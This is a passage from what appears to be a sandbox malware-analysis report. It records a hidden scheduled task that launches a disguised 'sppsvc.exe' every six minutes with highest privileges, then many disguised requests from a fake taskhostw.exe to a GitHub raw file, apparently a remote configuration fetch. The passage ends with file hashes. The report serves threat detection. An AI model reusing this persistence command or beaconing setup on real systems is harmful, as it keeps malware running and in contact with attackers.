                                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\sppsvc.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1940

                                          Network

                                          • flag-us
                                            DNS
                                            97.17.167.52.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            97.17.167.52.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            138.32.126.40.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            138.32.126.40.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            95.221.229.192.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            95.221.229.192.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            raw.githubusercontent.com
                                            taskhostw.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            raw.githubusercontent.com
                                            IN A
                                            Response
                                            raw.githubusercontent.com
                                            IN A
                                            185.199.109.133
                                            raw.githubusercontent.com
                                            IN A
                                            185.199.108.133
                                            raw.githubusercontent.com
                                            IN A
                                            185.199.110.133
                                            raw.githubusercontent.com
                                            IN A
                                            185.199.111.133
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:38:26 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600063-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 2
                                            X-Timer: S1734896306.198981,VS0,VE0
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 93d7b8e88c733f84644ab954ed1e37b8f10bd742
                                            Expires: Sun, 22 Dec 2024 19:43:26 GMT
                                            Source-Age: 114
                                          • flag-us
                                            DNS
                                            133.109.199.185.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            133.109.199.185.in-addr.arpa
                                            IN PTR
                                            Response
                                            133.109.199.185.in-addr.arpa
                                            IN PTR
                                            cdn-185-199-109-133githubcom
                                          • flag-us
                                            DNS
                                            228.249.119.40.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            228.249.119.40.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:38:37 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600089-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 2
                                            X-Timer: S1734896318.876728,VS0,VE0
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: e789e49fc8cf2c8f07beb75050dbfe2b7dffe485
                                            Expires: Sun, 22 Dec 2024 19:43:37 GMT
                                            Source-Age: 126
                                          • flag-us
                                            DNS
                                            15.164.165.52.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            15.164.165.52.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            212.20.149.52.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            212.20.149.52.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            181.129.81.91.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            181.129.81.91.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:38:51 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600035-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 1
                                            X-Timer: S1734896332.517864,VS0,VE1
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 25d37034d654a393f119121829e17ea1f4ba4742
                                            Expires: Sun, 22 Dec 2024 19:43:51 GMT
                                            Source-Age: 140
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:38:58 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600079-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 1
                                            X-Timer: S1734896338.166141,VS0,VE1
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 8b85dbcea35380f40777e3ccfd6bfed2e915ac7b
                                            Expires: Sun, 22 Dec 2024 19:43:58 GMT
                                            Source-Age: 147
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:39:04 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600055-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 1
                                            X-Timer: S1734896345.802946,VS0,VE1
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 171179a60dbf0c4142fc1858b6d73348bc7ca029
                                            Expires: Sun, 22 Dec 2024 19:44:04 GMT
                                            Source-Age: 153
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:39:17 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600065-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 1
                                            X-Timer: S1734896358.703233,VS0,VE1
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 4d60d7cda5b0eadf19bc29e26b178260f4eb5fc7
                                            Expires: Sun, 22 Dec 2024 19:44:17 GMT
                                            Source-Age: 166
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 19E9:F25E4:2159C1:2CD3F2:67685058
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:39:29 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lon4256-LON
                                            X-Cache: HIT
                                            X-Cache-Hits: 1
                                            X-Timer: S1734896370.554640,VS0,VE1
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 9f3c8013a66218666a69bca31249cdda876a5b8f
                                            Expires: Sun, 22 Dec 2024 19:44:29 GMT
                                            Source-Age: 163
                                          • flag-us
                                            DNS
                                            86.49.80.91.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            86.49.80.91.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            48.229.111.52.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            48.229.111.52.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:39:45 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600020-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 2
                                            X-Timer: S1734896385.261955,VS0,VE0
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 3e27af4bb781d3eca1a957860f6a5dc163e495b9
                                            Expires: Sun, 22 Dec 2024 19:44:45 GMT
                                            Source-Age: 194
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:39:56 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600076-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 2
                                            X-Timer: S1734896396.107910,VS0,VE0
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 23d5fe40e9773d0340abeeb207a3794666ea06b4
                                            Expires: Sun, 22 Dec 2024 19:44:56 GMT
                                            Source-Age: 204
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 19E9:F25E4:2159C1:2CD3F2:67685058
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:40:02 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lon4221-LON
                                            X-Cache: HIT
                                            X-Cache-Hits: 1
                                            X-Timer: S1734896403.727527,VS0,VE2
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 771c311630173c0e9b5881d119d7099a9e1d6726
                                            Expires: Sun, 22 Dec 2024 19:45:02 GMT
                                            Source-Age: 196
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:40:16 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600065-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 2
                                            X-Timer: S1734896417.968844,VS0,VE0
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 66b550fcdfb4b448cd22f7059ebab888d6ce03c1
                                            Expires: Sun, 22 Dec 2024 19:45:16 GMT
                                            Source-Age: 225
                                          • flag-us
                                            GET
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            taskhostw.exe
                                            Remote address:
                                            185.199.109.133:443
                                            Request
                                            GET /justbio123/raven/main/api.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Content-Length: 4
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
                                            Accept-Ranges: bytes
                                            Date: Sun, 22 Dec 2024 19:40:32 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-lcy-eglc8600060-LCY
                                            X-Cache: HIT
                                            X-Cache-Hits: 2
                                            X-Timer: S1734896432.184855,VS0,VE0
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: c9cbeb322e784d770aa31e84eead5250bb10e2b1
                                            Expires: Sun, 22 Dec 2024 19:45:32 GMT
                                            Source-Age: 241
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            897 B
                                            5.1kB
                                            8
                                            9

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            849 B
                                            5.1kB
                                            8
                                            9

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            897 B
                                            5.1kB
                                            8
                                            9

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            897 B
                                            5.1kB
                                            8
                                            10

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            896 B
                                            5.1kB
                                            8
                                            10

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            861 B
                                            5.1kB
                                            8
                                            9

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            861 B
                                            5.1kB
                                            8
                                            10

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            914 B
                                            5.1kB
                                            8
                                            9

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            914 B
                                            5.1kB
                                            8
                                            10

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            896 B
                                            5.1kB
                                            8
                                            9

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            897 B
                                            5.1kB
                                            8
                                            9

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 185.199.109.133:443
                                            https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                            tls, http
                                            taskhostw.exe
                                            914 B
                                            5.1kB
                                            8
                                            9

                                            HTTP Request

                                            GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                            HTTP Response

                                            200
                                          • 8.8.8.8:53
                                            97.17.167.52.in-addr.arpa
                                            dns
                                            71 B
                                            145 B
                                            1
                                            1

                                            DNS Request

                                            97.17.167.52.in-addr.arpa

                                          • 8.8.8.8:53
                                            138.32.126.40.in-addr.arpa
                                            dns
                                            72 B
                                            158 B
                                            1
                                            1

                                            DNS Request

                                            138.32.126.40.in-addr.arpa

                                          • 8.8.8.8:53
                                            95.221.229.192.in-addr.arpa
                                            dns
                                            73 B
                                            144 B
                                            1
                                            1

                                            DNS Request

                                            95.221.229.192.in-addr.arpa

                                          • 8.8.8.8:53
                                            raw.githubusercontent.com
                                            dns
                                            taskhostw.exe
                                            71 B
                                            135 B
                                            1
                                            1

                                            DNS Request

                                            raw.githubusercontent.com

                                            DNS Response

                                            185.199.109.133
                                            185.199.108.133
                                            185.199.110.133
                                            185.199.111.133

                                          • 8.8.8.8:53
                                            133.109.199.185.in-addr.arpa
                                            dns
                                            74 B
                                            118 B
                                            1
                                            1

                                            DNS Request

                                            133.109.199.185.in-addr.arpa

                                          • 8.8.8.8:53
                                            228.249.119.40.in-addr.arpa
                                            dns
                                            73 B
                                            159 B
                                            1
                                            1

                                            DNS Request

                                            228.249.119.40.in-addr.arpa

                                          • 8.8.8.8:53
                                            15.164.165.52.in-addr.arpa
                                            dns
                                            72 B
                                            146 B
                                            1
                                            1

                                            DNS Request

                                            15.164.165.52.in-addr.arpa

                                          • 8.8.8.8:53
                                            212.20.149.52.in-addr.arpa
                                            dns
                                            72 B
                                            146 B
                                            1
                                            1

                                            DNS Request

                                            212.20.149.52.in-addr.arpa

                                          • 8.8.8.8:53
                                            181.129.81.91.in-addr.arpa
                                            dns
                                            72 B
                                            147 B
                                            1
                                            1

                                            DNS Request

                                            181.129.81.91.in-addr.arpa

                                          • 8.8.8.8:53
                                            86.49.80.91.in-addr.arpa
                                            dns
                                            70 B
                                            145 B
                                            1
                                            1

                                            DNS Request

                                            86.49.80.91.in-addr.arpa

                                          • 8.8.8.8:53
                                            48.229.111.52.in-addr.arpa
                                            dns
                                            72 B
                                            158 B
                                            1
                                            1

                                            DNS Request

                                            48.229.111.52.in-addr.arpa

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                            Filesize

                                            2KB

                                            MD5

                                            d85ba6ff808d9e5444a4b369f5bc2730

                                            SHA1

                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                            SHA256

                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                            SHA512

                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\taskhostw.exe.log

                                            Filesize

                                            1KB

                                            MD5

                                            baf55b95da4a601229647f25dad12878

                                            SHA1

                                            abc16954ebfd213733c4493fc1910164d825cac8

                                            SHA256

                                            ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                            SHA512

                                            24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            77d622bb1a5b250869a3238b9bc1402b

                                            SHA1

                                            d47f4003c2554b9dfc4c16f22460b331886b191b

                                            SHA256

